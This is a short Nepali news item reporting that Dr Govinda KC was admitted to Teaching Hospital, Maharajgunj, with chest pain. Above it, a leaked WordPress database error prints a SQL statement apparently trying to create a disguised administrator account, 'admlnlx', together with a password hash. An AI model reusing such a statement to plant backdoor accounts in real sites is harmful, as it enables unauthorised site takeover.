WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZC31VsXWgkItzXeAyY.crrsNIsDzf.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 11:26:05', '', 'admlnlx', 'admlnlx')

काठमाडौँ । मङ्सिर ३, प्राध्यापक डा गोविन्द केसी महाराजगन्ज स्थित टिचिङ अस्पताल भर्ना भएका छन् ।
छातीमा अत्याधिक दुखाइका कारण डा केसीलाई आज बिहान ४ बजे अस्पताल भर्ना गरिएको उनका सहयोगीले जानकारी दिएका छन् ।
डाक्टर अभिषेक सिंहका अनुसार अहिले उनको मनमोहन कार्डियोथोरासी भास्कुलर तथा ट्रान्सप्लान्ट सेन्टर महाराजगन्ज ईमर्जेन्सी विभागमा उपचार भइरहेको छ ।
डा. सिंहका अनुसार हाल उनको उपचार चलिरहेको र रिपोर्ट आउन बाँकी रहेको छ ।